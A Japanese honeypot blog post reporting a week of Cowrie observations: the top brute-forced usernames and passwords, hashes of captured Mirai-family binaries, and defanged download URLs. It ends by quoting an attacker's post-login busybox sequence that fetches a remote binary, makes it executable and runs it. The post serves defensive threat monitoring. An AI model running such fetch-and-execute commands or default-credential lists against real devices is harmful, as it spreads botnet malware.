ハニーポットの観測記録

ハニーポッターすぎたむちのぶろぐ

ハニーポット観察記録【11】

先週は時間がなくて、更新できませんでした。

以下、Cowrie運用56日目の簡易報告です。

直近7日分の集計結果を公開します。

ダッシュボードと集計結果

ダッシュボード
※集計期間:2018/09/22~2018/09/29
f:id:SugitaMuchi:20180929123852p:plain f:id:SugitaMuchi:20180929124234p:plain ※map(event),pie(country),grahp(protocol)
※grahp(password),grahp(username)

すいません、usernameとpasswordいつもと逆ですw


■ログイン試行回数( username )
※集計期間:2018/09/22~2018/09/29
※ログ集計分
※上位10件

試行回数 username
12991 root
7903 admin
3437 user
2051 support
785 default
124 guest
31 &;;
24 daemon
23 adm
23 oracle

全体的にアタックが多い印象ですがroot,admin,user,support,defaultなど
いつもの4倍から5倍ほど観測しております。


■ログイン試行回数( password )
※集計期間:2018/09/22~2018/09/29
※ログ集計分
※上位10件

試行回数 password
7691 changeme
3991 admin
3961 123456
3866 pass
3603 zyad1234
2051 support
618 (non pass)
258 default
188 aquario
167 S2fGqNFs

今までなかったchangemeをかなり観測している印象です。
このchangemeというのはOracle ILOMで使用されているようですが、
それ以外のシステムなどでも使用されているのでしょうか。。
またchangemeをパスワードに使用したアクセス元IPは以下の3つでした。
46.101.18.241/Londonアタック全体の約47%
104.248.239.195/Wilmingtonアタック全体の約15%
209.97.185.223/Schaumburgアタック全体の約10%
なお、不正ログイン後の活動としてはいつものMirai関連の攻撃でした。


■ログイン試行回数( username / password )
※集計期間:2018/09/22~2018/09/29
※ログ集計分
※上位10件

試行回数 username / password
7691 root / changeme
3861 admin / admin
3815 admin / pass
3765 user / 123456
3602 root / zyad1234
1333 support / support
420 root / (non pass)
192 admin / aquario
174 default / S2fGqNFs
150 default / default

今回はかなりアタックが多い印象です・・・
また、ユーザ名とパスワードはroot/changemeのセットで観測しています。
Oracle ILOMを狙った攻撃かはわかりませんが、changemeを利用しているなら
必ず変更しましょう。

ダウンロードされたファイルについて


■ダウンロードされたファイル
※集計期間:2018/09/22~2018/09/29

全部で82ファイルとなりました。

003dd5d29279e11ede4faaf9ca535f013711365548f4bb24200050682681cb47: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
0344fd17955e6df23c3df4eba2a99a73d0eb530ef9cd001c81b5eea0ab993066: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
06e849d5abafee6122a80bd324bff85113101e1600c046b8ed427ddb2b262572: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
0baa8c3b13864d8a1c65636236a0da4f0661c1be1021e50a9004ad272cead0bf: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
0cd0b97e66037fcdffb4ef7ddb1c20597dadef3482faa2bb57616bfe8fd2dcff: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, stripped
0f1ddea247e3aac18c36d025436ac201f78d3e37b2edc8f1f96221380d21e933: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, stripped
136e4ab752568c05fb227a13ff071a2670217b67d217a7e7213aa8b2d97df7bb: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped
142c7bb3b78e5c21d5c91d25ff1ab9b361e645bd9d20ad54e8f0a15ef0cbadd8: Bourne-Again shell script, ASCII text executable
1a12aa26a69f7e607d7bb5e53a0e7bb88b84e36b85d90ce7dd20f289f5486fa1: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
1aa4ecd21ba2b12452588ba164217bfc9fecc2fddfcfa56283871ce5d36b585a: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
1bddb90a6c172011228e4b0381cfd19975a8e4cb2f78effe38136018749f7f66: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
1c91c4bcc224889ffdce65c2a21ac35c80bd145ee65f6b8f60b4a4d3f3742e7a: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
202211688bd1ed43ac9136a9d97eedf2e629a7c4827e6230107ce4afe60fc94c: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
20927eeb0246ee7f046347e694099adc3de2cd7a4dae41228f1208cde6ab2276: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
26242c26b8185d7e92e145bbca49ceca6169c90f4fbe5c18df1d9c70000cfd33: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
2aad28539ab9493ec5406384fc88bda2b2c68af8b57b32858235fc0c3cf63512: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
2ff3412794def25ecf5ba06487111370bb955402133fe31a6432b08d4b4323a3: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
31ba4fdbef4ff7c0ecbf0a201e837be4a90c3842e491d57e3c849c7159cbe611: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
34c7a3cc5fc41467a4ac392f65a792d56c919c473d53f910cb2e931ecb4307ae: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
395f4330bf488ce416cb947ddf459462b2e5f17eef5af23e0bca571bfd844a76: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
3eb047f020bf7beee97e7b8ce5829694953d47273446186a246c4885548c429e: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
408d6324a38d37c19e1ca9cbf29c56ca02bfd0596f237f0ea1628387d3fc0bd6: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
40cdc462a2a5251763600b2c7eafb6895ade89fe56c812032effb5f581cec094: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, stripped
418998f72bd0bc25f5f1c1d91ed574cc4cb9b324a9c559ad19ca0172f77af21a: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped
435aae2365debd2b3e75b392c16b157f62e7f15934cf17c68266c7dc6d44a587: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
47649e18519b134d5623cb67898745fcbd03ff8dfd77bd1d64efb422e85a927d: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
4a337f7069d98ba9c7256ab89bd910e799b442b2487d23368e72f728fa786109: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
4d0f0401804f49079fbe916717442e825126bf4ea0474e3a4e54f461c3093ffc: Bourne-Again shell script, ASCII text executable
50cb676404b2d976e78f2b8e325db4553da9000cd9b0ce853d3fd3aac4f25a84: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
57aafe25f4b5b3f7542d25894338a48a4141301d06542f69d9d1c23c2ab443c3: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
58d2db0bc8d93a30101eb87ef28c7dbf1af61ae2ebc355f6a236ab594a236f4b: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped
63e6fa4c5ad13b6bd3cb27d9d7239eb8b665fbabaedd1b3bd75ad80337f885a1: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
65efe3814c3a7ea92c61651e171de4114bd8b857b54c38f9a36f3f3a9cd4212e: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
6ad8fdcf9872464dca6f34edc60f0d646a42dd96ca6141b457f33e6bf42ccb81: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
6adb47f1bdef5e71bbae8ae7b503d47b95d269e18e55faa4042eadaa0c907a8c: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
6d20c19baf1a26e97fa67dc28ed675bd63e2ac263949e33e900ac7682918ebc3: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
6d61121283bd28d48c21c947605252926f1c9ea4645f43e1c81a8fbb3e591c01: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
71154ce31b8ead5254a3bc51c7aa4637f339a002de2ab86f1c7ec165f10c5be0: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
73ddff46d53862c6cbba117d3adaca56e52f09e8c90d9d7af7affd43c1c60f75: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, stripped
7b8102522bbaf7ee8f857820ef6d84244f8e176f7edf994c6bd3bd01f0079fea: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
81fdecd634797b8d740490c652c1d6eb102a73a04e26071175934337e128bddb: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
82ddd62be462c4fe752c899eaf421998835cba7752cc5bfe18ef010c987d4376: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, stripped
8666e78ca95ffeb30731974b4205e97cb8dbaa4ecea2409b68bd3216bf9ef7eb: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
8adc7a947ee28638ac264f04f618407e51b9f257f64863ea43089e527bf10aad: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
8ec4c47db4ca26a24a15822122a55d61169d124747204c5c84878006dd725987: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, stripped
90dcf472bc84ec559c97513996347d40e1c1dba7891a254f30220d3a57a35b28: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
96795ac1c6c638b588f7e848c956e7854f41c789c30855b3dada9a929c5da66c: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
98566ec017e3e253c06d1c164339c03b19e9c6e42beb9cb968c7400b5055c83c: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
9bc3bf4d8d00fc272ba8f42baae1fd1ede5f7efa9d4988951ca1bf28c4142f13: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, stripped
9d346a30c4948c53892f8bad577a36ae0585763513e7f2c8c9d43555c5f52659: Bourne-Again shell script, ASCII text executable
9ff5e522a57859f316cc973761b49bacb02e5dabc7b44c363244890429e3fa55: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
a15bb1ab3cb0551cb8d23bd50bbbc45bab3ef1f8d15138ee402b79ff1a72ec4b: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
a216b5694ad8d76e023115a1a6b4ae3d94d6e6be2c6d850f0cc63d524305af0b: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
a2b9cd7975296ecb68b93ebdaf1508eb6ed4eb92822acd46d0d0b7f88199c9b3: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
a36bb0ba71f4bbefbb89d1193e8237ec7e7db57cdaf4efda3699d2d599fcf9f2: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
a4f5050bd242a86481e70b93d8c5079f2ddb9a267b9dacb4270efeab105c7000: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
a78a347dfd99fdb86dd42270e889ff0c73349ec45c0f7973e1bb1cfa5f62f18c: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, stripped
a9ead2f63ff42d41d272ace6507c3005b0388db93523c5fe7118c164e8201706: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
aa13f799e5cef5015a8cdf55bcbadbbeb3704f54da0f9be4b1e356e857c93d32: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, stripped
ab61d4474a6475159eddb399a7f1aaa475a1bbf57e1a0baf566a92d6edf452f1: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, stripped
ad1d1688753fb43deacd2da486048f894ce2be406915c6f22cde4df07c68cc2b: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
ad732240294b19468b8145c5d0100f6b754d5e9f5699732b2718ec43607b652a: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
ae2b73f9c22a2873ce0d7259f30c00193f37ca37dd7603f0ed457c9464a8df61: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
b33b30c3cc7e027320e4d203303cc36a4e84b44451278bbb524ec54d5f61a4d6: ASCII text, with very long lines
b4eb5450afc9cc67f888d11cb480a18f3392e7ed76c1d9ba78e9a809fb29c499: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
b7744ca9dcaed3a22bac425ce631006713056e46a1cc46f72f038061db0b8ef5: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
bc5d4ca58b133b0f2b599065e12a53d91fffd8aab2eac50a70644bc27a27e985: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
c179b9e54159946737b215a9c31477fab82906daeffcfaff0e8f0799280a8e51: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
c22ff0e6959744c11d1510a31243a99dcace31e515681e79a0d018e144c9a36c: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
c24c7fba82b9be0a0ed557ad9a0fc3dafebcec9869c5c712195defa669af6689: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
c2576e916d0b05bc015da92bb302adfa11029c1ecd480b500bb7588b6491fd80: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
c896208896abd023ee6b639792bba83a90b5acdde64899136eda1f88b7a97339: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
ceac8fc10c49390d3aef943323ccda0bfd853ff5b9e0a61a58eebf8312f3719f: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
cfdc44e3ffd0e98c3d1152bcbdbfcddc670f65baabde53f79efe4f6ea48d0855: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
d9d61ad6264774125657e58fb79d7f86447c2356deb22ef535def4ed84b83150: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
dab9a1b4b87930f5cf2d5e7cac8e726a71aecca6f76d714a3db604f776dcf4ad: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
deca31a792f8c0be287fcddc975e98ae314de05cc6d1d8fb4c4c0597360ca656: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
dee4d74deefdee0e4ef6a750ccd752ad23b92443385cbae4a51158724d595273: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
e4ef99bdba8013232c63cf75225a1da2b3551bc02e9e2d93fa2c9d190196e07d: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
eef3d7f601f2993885d91661aaf524771a6b92bf072fd408e65d5ff7dc8d1a01: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
fa0e29a629ebb5d6fd3e6c0ed6899033f1806cde1925dc18328889b6028a518d: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped
fba9681c2c8ac70abfc2359f96337b54013beb535b2f3a778025d2cb74576043: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped

■ダウンロードログ
※集計期間:2018/09/22~2018/09/29
※危険なので接続しないでください。

12429 (hxxp://46[.]101[.]18[.]241:80/bins/sora[.]x86)
3791 (hxxp://104[.]248[.]239[.]195:80/bins/hoho[.]x86)
2133 (hxxp://209[.]97[.]185[.]223:80/bins/system[.]x86)
1209 (hxxp://104[.]248[.]207[.]14:80/AB4g5/Josho[.]x86)
618 (hxxp://185[.]244[.]25[.]176:80/bins/gemini[.]x86)
441 (hxxp://80[.]211[.]6[.]55:80/bins/apep[.]x86)
230 (hxxp://194[.]182[.]65[.]56:80/bins/juno[.]x86)
207 (hxxp://194[.]182[.]65[.]56:80/bins/apep[.]x86)
156 (hxxp://194[.]36[.]173[.]4:80/vi/x86[.]bushido)
145 (hxxp://128[.]199[.]222[.]37:80/bins/yakuza[.]x86)
125 (hxxp://46[.]101[.]203[.]135:80/bins/hoho[.]x86)
94 (hxxp://46[.]17[.]46[.]147:80/x86)
76 (hxxp://80[.]211[.]57[.]80:80/miori[.]x86)
76 (hxxp://128[.]199[.]137[.]201:80/bins/hades[.]x86)
65 (hxxp://159[.]65[.]164[.]83:80/bins/owari[.]x86)
54 (hxxp://185[.]244[.]25[.]200:80/AB4g5/Josho[.]x86)
47 (hxxp://167[.]99[.]34[.]197:80/bins/gemini[.]x86)
43 (hxxp://185[.]244[.]25[.]165:80/Binarys/Owari[.]x86)
43 (hxxp://142[.]93[.]28[.]248:80/bins/hoho[.]x86)
36 (hxxp://185[.]244[.]25[.]202:80/bins/DEMONS[.]x86)
27 (hxxp://159[.]89[.]204[.]166:80/bins/yakuza[.]x86)
24 (hxxp://46[.]29[.]166[.]125:80/bins/apep[.]x86)
22 (hxxp://104[.]248[.]52[.]118/sensi[.]sh)
21 (hxxp://46[.]17[.]47[.]25:80/bins/hoho[.]x86)
18 (hxxp://46[.]29[.]166[.]125:80/bins/juno[.]x86)
16 (hxxp://80[.]211[.]112[.]216:80/gaybub/miori[.]x86)
16 (hxxp://46[.]29[.]165[.]121:80/kohan[.]x86)
15 (hxxp://94[.]177[.]241[.]55:80/bins/gemini[.]x86)
14 (hxxp://195[.]22[.]126[.]16/ssh1[.]txt)
12 (hxxp://178[.]128[.]168[.]121:80/AB4g5/Josho[.]x86)
12 (hxxp://159[.]89[.]204[.]166:80/bins/netbot[.]x86)
12 (hxxp://142[.]93[.]169[.]38:80/AB4g5/Josho[.]x86)
10 (hxxp://81[.]2[.]240[.]140:80/AB4g5/Josho[.]x86)
8 (hxxp://178[.]128[.]75[.]37:80/bins/VPNFilter[.]x86)
6 (hxxp://80[.]211[.]80[.]49:80/bins/gemini[.]x86)
6 (hxxp://104[.]248[.]52[.]118:80/Binarys/Owari[.]x86)
5 (hxxp://95[.]179[.]169[.]47:80/SSG/x86[.]SSG)
5 (hxxp://185[.]244[.]25[.]153/telnet[.]sh)
5 (hxxp://185[.]244[.]25[.]131:80/Binarys/Owari[.]x86)
4 (hxxp://185[.]244[.]25[.]138:80/Binarys/Owari[.]x86)
4 (hxxp://128[.]199[.]175[.]181:80/bins/gemini[.]x86)
4 (hxxp://104[.]248[.]233[.]254:80/bins/VPNFilter[.]x86)
3 (hxxp://92[.]114[.]54[.]176:48841/lvn3/eU)
3 (hxxp://77[.]70[.]116[.]252:47136/lvn3/eU)
3 (hxxp://204[.]48[.]29[.]66:80/AB4g5/Josho[.]x86)
3 (hxxp://185[.]244[.]25[.]200:80/Binarys/Owari[.]x86)
3 (hxxp://118[.]232[.]220[.]241:16583/lvn3/eU)
2 (hxxp://46[.]29[.]164[.]160:80/bins/sora[.]x86)
2 (hxxp://217[.]61[.]7[.]146:80/neko[.]x86)
2 (hxxp://217[.]61[.]134[.]15:56879/lvn3/eU)
2 (hxxp://195[.]181[.]213[.]57:80/bins/sora[.]x86)
2 (hxxp://186[.]71[.]208[.]114:22548/lvn3/eU)
2 (hxxp://185[.]244[.]25[.]150:80/bins/otaku[.]x86)
2 (hxxp://109[.]125[.]204[.]39:4958/lvn3/eU)
1 (hxxp://89[.]108[.]103[.]158:80/Nikita[.]x86)
1 (hxxp://46[.]17[.]43[.]229:80/vi/x86[.]bushido)
1 (hxxp://205[.]185[.]122[.]121:80/bins/hades[.]x86)
1 (hxxp://194[.]182[.]73[.]177:80/Nikita[.]x86)
1 (hxxp://185[.]244[.]25[.]134:80/bins/owari[.]x86)
1 (hxxp://185[.]244[.]25[.]133/ReppinWithMips[.]sh)
1 (hxxp://172[.]245[.]173[.]145:80/AB4g5/Josho[.]x86)
1 (hxxp://167[.]99[.]45[.]134:80/AkiruBotnet/Akiru[.]x86)
1 (hxxp://167[.]99[.]171[.]127:80/Binarys/Owari[.]x86)

■補足
上述しておりますが、Oracle ILOMを狙ったと思われるアタックについて、
root/changemeにてログイン試行後成功した場合、以下のコマンドが実行されます。

enable
system
shell
sh
>/tmp/.ptmx && cd /tmp/
>/var/.ptmx && cd /var/
>/dev/.ptmx && cd /dev/
>/mnt/.ptmx && cd /mnt/
>/var/run/.ptmx && cd /var/run/
>/var/tmp/.ptmx && cd /var/tmp/
>/.ptmx && cd /
>/dev/netslink/.ptmx && cd /dev/netslink/
>/dev/shm/.ptmx && cd /dev/shm/
>/bin/.ptmx && cd /bin/
>/etc/.ptmx && cd /etc/
>/boot/.ptmx && cd /boot/
>/usr/.ptmx && cd /usr/
/bin/busybox rm -rf 19ju3d 902i13
/bin/busybox cp /bin/busybox 19ju3d; >19ju3d; /bin/busybox chmod 777 19ju3d; /bin/busybox AK1K2
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox AK1K2
/bin/busybox wget; /bin/busybox tftp; /bin/busybox AK1K2
/bin/busybox wget hxxp://46[.]101[.]18[.]241:80/bins/sora[.]x86 -O - > 19ju3d; /bin/busybox chmod 777 19ju3d; /bin/busybox AK1K2
./19ju3d loader.wget; /bin/busybox O2J134
/bin/busybox rm -rf 902i13; >19ju3d; /bin/busybox AK1K2

以上となります。